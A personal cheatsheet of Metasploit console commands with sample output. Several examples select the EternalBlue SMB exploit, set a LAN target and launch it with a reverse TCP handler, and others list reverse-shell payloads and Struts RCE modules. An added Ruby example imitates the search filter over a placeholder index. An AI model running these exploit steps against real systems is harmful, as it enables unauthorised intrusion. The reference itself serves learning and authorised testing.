Metasploit Console: my own cheatsheet

Metasploit Framework is a priceless open-source tool for developing and executing exploit code against a remote target machine.

Its main admin interface, the Metasploit console, has many different command options to choose from.
Here is my own set (in alphabetical order) of the main Metasploit commands with a brief reference for each.


back

Once you have finished working with a particular module use the back command to move out of the current context.

msf exploit(multi/http/struts2_content_type_ognl) > back
msf >

check

Checks whether a target is vulnerable (not supported by all exploit modules).

msf exploit(multi/http/struts2_content_type_ognl) > check
[*] www.xxxxxx.org:8080 The target is not exploitable.

color

Enable or disable color output of msfconsole.

msf > color
Usage: color <'true'|'false'|'auto'>

Enable or disable color output.

connect

Netcat-like command built into the msfconsole.

msf > connect 192.168.1.1 80
[*] Connected to 192.168.1.1:80

HTTP/1.0 400 Bad Request
Content-Type: text/html
X-Frame-Options: SAMEORIGIN
Date: Tue, 05 Dec 2017 14:12:13 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes
Connection: close

<html>
<head>
 <title>400 Bad Request</title>
</head>
<body bgcolor="#ffffff">
 <h2>400 Bad Request</h2>
 <p></p>
</body>
</html>
msf >

edit

Edit the current module in Vim.

msf exploit(windows/smb/ms17_010_eternalblue) > edit
[!] LocalEditor or $VISUAL/$EDITOR should be set. Falling back on vim.
[*] Launching vim /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb

exit

Exit msfconsole.

msf exploit(windows/smb/ms17_010_eternalblue) > exit
[email protected]:~$

exploit (run)

Starts the current exploit.

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.6:4444
[*] 192.168.1.1:445 - Connecting to target for exploitation.

grep

This command is similar to Linux grep: it matches a given pattern in the output of another msfconsole command.

msf > grep
Usage: grep [options] pattern cmd

Grep the results of a console command (similar to Linux grep command)

OPTIONS:

    -A <opt>  Show arg lines of output After a match.
    -B <opt>  Show arg lines of output Before a match.
    -c        Only print a count of matching lines.
    -h        Help banner.
    -i        Ignore case.
    -k <opt>  Keep (include) arg lines at start of output.
    -m <opt>  Stop after arg matches.
    -s <opt>  Skip arg lines of output before attempting match.
    -v        Invert match.


help

Returns a list and small description of all available commands.

msf > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host

info

Provides detailed information about a particular module including all options, targets, and other information.

msf > info exploit/windows/smb/ms17_010_eternalblue

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Sean Dillon <[email protected]>
  Dylan Davis <[email protected]>
  Equation Group
  Shadow Brokers
  thelightcosine

Available targets:
  Id  Name
  --  ----
  0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Basic options:
...

irb

Opens a live Ruby interpreter shell inside msfconsole.

msf > irb
[*] Starting IRB shell...

>> puts "Test!"
Test!

jobs

Provides the ability to list and terminate background jobs.

msf > jobs -h
Usage: jobs [options]

Active job manipulation and interaction.

OPTIONS:

    -K        Terminate all running jobs.
    -h        Help banner.
    -i <opt>  Lists detailed information about a running job.
    -k <opt>  Terminate the specified job name.
    -l        List all running jobs.
    -v        Print more detailed info.  Use with -i and -l

msf >

kill

Kills a running job by its job id.

msf exploit(windows/smb/ms17_010_eternalblue) > kill 0
Stopping job: 0...

load

Loads a plugin from Metasploit’s plugin directory.

msf > load
Usage: load [var=val var=val ...]

Loads a plugin from the supplied path.
For a list of built-in plugins, do: load -l
The optional var=val options are custom parameters that can be passed to plugins.


loadpath

Loads a third-party module tree from the given path.

msf > loadpath /home/andrea/modules

Loaded 0 modules.

unload

Unloads a previously loaded plugin and removes any extended commands.

msf > unload pcap_log
Unloading plugin pcap_log...unloaded.

resource

Runs resource files that can be loaded through msfconsole.

msf > resource
Usage: resource path1 [path2 ...]

Run the commands stored in the supplied files.  Resource files may also contain
ruby code between <ruby></ruby> tags.

See also: makerc

search

Regular-expression based search functionality (note that the naming convention for Metasploit modules uses underscores rather than hyphens).

msf > search struts

Matching Modules
================

   Name                                                     Disclosure Date  Rank       Description
   ----                                                     ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl             2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts2_rest_xstream                  2017-09-05       excellent  Apache Struts 2 REST Plugin XStream RCE
   exploit/multi/http/struts_code_exec                      2010-07-13       good       Apache Struts Remote Command Execution
   exploit/multi/http/struts_code_exec_classloader          2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_code_exec_exception_delegator  2012-01-06       excellent  Apache Struts Remote Command Execution

Searches can be refined by using a built-in keyword system:

msf > help search
Usage: search [keywords]

Keywords:
  app       :  Modules that are client or server attacks
  author    :  Modules written by this author
  bid       :  Modules with a matching Bugtraq ID
  cve       :  Modules with a matching CVE ID
  edb       :  Modules with a matching Exploit-DB ID
  name      :  Modules with a matching descriptive name
  platform  :  Modules affecting this platform
  ref       :  Modules with a matching ref
  type      :  Modules of a specific type (exploit, auxiliary, or post)

Examples:
  search cve:2009 type:exploit app:client

name

Search using a descriptive name.

msf > search name:struts

Matching Modules
================

   Name                                                     Disclosure Date  Rank       Description
   ----                                                     ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl             2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts2_rest_xstream                  2017-09-05       excellent  Apache Struts 2 REST Plugin XStream RCE
   exploit/multi/http/struts_code_exec                      2010-07-13       good       Apache Struts Remote Command Execution
   exploit/multi/http/struts_code_exec_classloader          2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_code_exec_exception_delegator  2012-01-06       excellent  Apache Struts Remote Command Execution

platform

Search for modules that affect a specific platform.

msf > search platform:android

Matching Modules
================

   Name                                                      Disclosure Date  Rank       Description
   ----                                                      ---------------  ----       -----------
   exploit/android/browser/samsung_knox_smdm_url             2014-11-12       excellent  Samsung Galaxy KNOX Android Browser RCE
   exploit/android/browser/stagefright_mp4_tx3g_64bit        2015-08-13       normal     Android Stagefright MP4 tx3g Integer Overflow
   exploit/android/browser/webview_addjavascriptinterface    2012-12-21       excellent  Android Browser and WebView addJavascriptInterface Code Execution
   exploit/android/fileformat/adobe_reader_pdf_js_interface  2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   exploit/android/local/futex_requeue                       2014-05-03       excellent  Android 'Towelroot' Futex Requeue Kernel Exploit
   exploit/android/local/put_user_vroot                      2013-09-06       excellent  Android get_user/put_user Exploit
   exploit/multi/handler                                                      manual     Generic Payload Handler
   exploit/multi/local/allwinner_backdoor                    2016-04-30       excellent  Allwinner 3.4 Legacy Kernel Local Privilege Escalation
   payload/android/meterpreter/reverse_http                                   normal     Android Meterpreter, Android Reverse HTTP Stager
   payload/android/meterpreter/reverse_https                                  normal     Android Meterpreter, Android Reverse HTTPS Stager
   payload/android/meterpreter/reverse_tcp                                    normal     Android Meterpreter, Android Reverse TCP Stager
   payload/android/meterpreter_reverse_http                                   normal     Android Meterpreter Shell, Reverse HTTP Inline
   payload/android/meterpreter_reverse_https                                  normal     Android Meterpreter Shell, Reverse HTTPS Inline
   payload/android/meterpreter_reverse_tcp                                    normal     Android Meterpreter Shell, Reverse TCP Inline

author

Search for modules by a specific author.

msf > search author:rapid7

Matching Modules
================

   Name                                                       Disclosure Date  Rank       Description
   ----                                                       ---------------  ----       -----------
   auxiliary/admin/atg/atg_client                                              normal     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
   auxiliary/admin/cisco/cisco_asa_extrabacon                                  normal     Cisco ASA Authentication Bypass (EXTRABACON)
   auxiliary/admin/dns/dyn_dns_update                                          normal     DNS Server Dynamic Update Record Injection
   auxiliary/admin/http/allegro_rompager_auth_bypass          2014-12-17       normal     Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass
   auxiliary/admin/upnp/soap_portmapping                                       normal     UPnP IGD SOAP Port Mapping Utility
   auxiliary/dos/http/slowloris                               2009-06-17       normal     Slowloris Denial of Service Attack
   auxiliary/dos/misc/ibm_tsm_dos                             2015-12-15       normal     IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service

 

Keywords can also be combined to further narrow down the returned results:

msf > search type:exploit name:struts cve:2017

Matching Modules
================

   Name                                          Disclosure Date  Rank       Description
   ----                                          ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl  2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts2_rest_xstream       2017-09-05       excellent  Apache Struts 2 REST Plugin XStream RCE
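As an added example (not Metasploit's own code), here is a small Ruby re-implementation of the keyword filter described under `help search` above and used in the combined `type:exploit name:struts cve:2017` query; it runs offline over a module index constructed from the page's own `search struts` output, with placeholder authors and placeholder CVE references.

```ruby
# Added example, not Metasploit's own code: a small re-implementation of
# the keyword filtering that msfconsole's `search` command describes,
# run offline over a constructed module index.

# Constructed index: module names, descriptions and dates are the ones shown
# by the page's `search struts` output; authors and refs are placeholders,
# not the modules' real authors or CVE ids.
MODULE_INDEX = [
  { name: 'exploit/multi/http/struts2_content_type_ognl',
    desc: 'Apache Struts Jakarta Multipart Parser OGNL Injection',
    date: '2017-03-07', platform: 'multi', author: 'author_a', refs: ['CVE-2017-0000'] },
  { name: 'exploit/multi/http/struts2_rest_xstream',
    desc: 'Apache Struts 2 REST Plugin XStream RCE',
    date: '2017-09-05', platform: 'multi', author: 'author_a', refs: ['CVE-2017-0001'] },
  { name: 'exploit/multi/http/struts_code_exec',
    desc: 'Apache Struts Remote Command Execution',
    date: '2010-07-13', platform: 'multi', author: 'author_b', refs: ['CVE-2010-0000'] },
  { name: 'exploit/multi/http/struts_code_exec_classloader',
    desc: 'Apache Struts ClassLoader Manipulation Remote Code Execution',
    date: '2014-03-06', platform: 'multi', author: 'author_b', refs: ['CVE-2014-0000'] },
  { name: 'auxiliary/scanner/http/struts_version_placeholder', # constructed, non-exploit
    desc: 'Placeholder Struts Version Scanner',
    date: '2017-01-01', platform: 'multi', author: 'author_c', refs: ['CVE-2017-0002'] },
].freeze

KEYWORDS = %w[author cve name platform type].freeze

# Split "type:exploit name:struts cve:2017" into keyword filters and bare terms.
# Bare terms are case-insensitive regexes matched against the module name, as a
# plain `search struts` does; an unknown keyword is rejected, not silently ignored.
def parse_query(query)
  filters = Hash.new { |h, k| h[k] = [] }
  terms = []
  query.split.each do |token|
    key, value = token.split(':', 2)
    if value.nil?
      terms << Regexp.new(token, Regexp::IGNORECASE)
    elsif KEYWORDS.include?(key)
      filters[key] << value.downcase
    else
      raise ArgumentError, "unknown search keyword: #{key}"
    end
  end
  [filters, terms]
end

# Every bare term and every keyword value must match (AND), which is what
# narrows the result set when keywords are combined.
def matches?(mod, filters, terms)
  return false unless terms.all? { |re| re.match?(mod[:name]) }
  filters.all? do |key, values|
    values.all? do |v|
      case key
      when 'type'     then mod[:name].start_with?("#{v}/")
      when 'name'     then "#{mod[:name]} #{mod[:desc]}".downcase.include?(v)
      when 'platform' then mod[:platform].downcase == v
      when 'author'   then mod[:author].downcase.include?(v)
      when 'cve'      then mod[:refs].any? { |r| r.downcase.include?(v) }
      end
    end
  end
end

# Returns the names of the matching modules, in index order.
def search_modules(query, index = MODULE_INDEX)
  filters, terms = parse_query(query)
  index.select { |m| matches?(m, filters, terms) }.map { |m| m[:name] }
end
```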

sessions

Allows you to list, interact with, and kill spawned sessions.

msf > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C <opt>  Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -c <opt>  Run a command on the session given with -i, or all
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s <opt>  Run a script on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

set

Set framework options and parameters for the current module.

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.1      yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

unset

Removes a parameter previously configured with set. (unset all removes all assigned variables)

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(windows/smb/ms17_010_eternalblue) > unset rhost
Unsetting rhost...

setg

Sets a global variable within msfconsole. The current environment can be saved with the save command.

msf > setg LHOST 192.168.1.6
LHOST => 192.168.1.6
msf > setg RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > save 
Saved configuration to: /home/andrea/.msf4/config

show

Shows every module within Metasploit.

msf > show

Encoders
========

   Name                    Disclosure Date  Rank       Description
   ----                    ---------------  ----       -----------
   cmd/generic_sh                           good       Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                  low        Generic ${IFS} Substitution Command Encoder
   cmd/printf_php_mq                        manual     printf(1) via PHP magic_quotes Utility Command Encoder

auxiliary

Display a list of all of the available auxiliary modules.

msf > show auxiliary
Auxiliary
=========

   Name                                                  Disclosure Date  Rank    Description
   ----                                                  ---------------  ----    -----------
   admin/2wire/xslt_password_reset                       2007-08-15       normal  2Wire Cross-Site Request Forgery Password Reset Vulnerability
   admin/backupexec/dump                                                  normal  Veritas Backup Exec Windows Remote File Access
   admin/backupexec/registry                                              normal  Veritas Backup Exec Server Registry Access

exploits

Returns a list of all exploits contained in the framework.

msf > show exploits

Exploits
========

   Name                                                           Disclosure Date  Rank       Description
   ----                                                           ---------------  ----       -----------
   aix/rpc_cmsd_opcode21                                          2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   aix/rpc_ttdbserverd_realpath                                   2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
   bsdi/softcart/mercantec_softcart                               2004-08-19       great      Mercantec SoftCart CGI Overflow

payloads

show payloads will display all of the different payloads available.

msf > show payloads

Payloads
========

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   aix/ppc/shell_bind_tcp                                            normal  AIX Command Shell, Bind TCP Inline
   aix/ppc/shell_find_port                                           normal  AIX Command Shell, Find Port Inline
   aix/ppc/shell_interact                                            normal  AIX execve shell for inetd

 

In the context of a particular exploit, show payloads will only display the payloads that are compatible with that particular exploit.

msf exploit(windows/smb/ms17_010_eternalblue) > show payloads

Compatible Payloads
===================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   generic/custom                                               normal  Custom Payload
   generic/shell_bind_tcp                                       normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                    normal  Generic Command Shell, Reverse TCP Inline
   windows/x64/exec                                             normal  Windows x64 Execute Command
   windows/x64/loadlibrary                                      normal  Windows x64 LoadLibrary Path
   windows/x64/meterpreter/bind_ipv6_tcp                        normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support

targets

Within the context of an exploit module show targets returns which targets are supported.

msf exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

advanced

Displays the advanced options of the current module.

msf exploit(windows/smb/ms17_010_eternalblue) > show advanced

Module advanced options (exploit/windows/smb/ms17_010_eternalblue):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL3, TLS1, TLS1.1, TLS1.2, SSL23)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                0                no        Additional delay when waiting for a session

encoders

Display a listing of the encoders that are available within MSF.

msf > show encoders
Compatible Encoders
===================

   Name                    Disclosure Date  Rank       Description
   ----                    ---------------  ----       -----------
   cmd/generic_sh                           good       Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                  low        Generic ${IFS} Substitution Command Encoder
   cmd/printf_php_mq                        manual     printf(1) via PHP magic_quotes Utility Command Encoder
   generic/none                             normal     The "none" Encoder
   mipsbe/longxor                           normal     XOR Encoder
   mipsle/longxor                           normal     XOR Encoder
   php/base64                               great      PHP Base64 encoder
   ppc/longxor                              normal     PPC LongXOR Encoder
   ppc/longxor_tag                          normal     PPC LongXOR Encoder
   sparc/longxor_tag                        normal     SPARC DWORD XOR Encoder

nops

Display the available NOP Generators.

msf > show nops
NOP Generators
==============

   Name             Disclosure Date  Rank    Description
   ----             ---------------  ----    -----------
   armle/simple                      normal  Simple
   mipsbe/better                     normal  Better
   php/generic                       normal  PHP Nop Generator
   ppc/simple                        normal  Simple
   sparc/random                      normal  SPARC NOP Generator
   tty/generic                       normal  TTY Nop Generator
   x64/simple                        normal  Simple
   x86/opty2                         normal  Opty2
   x86/single_byte                   normal  Single Byte

use

Select a module.

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show info

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Sean Dillon <[email protected]>
  Dylan Davis <[email protected]>
  Equation Group
  Shadow Brokers
  thelightcosine

 

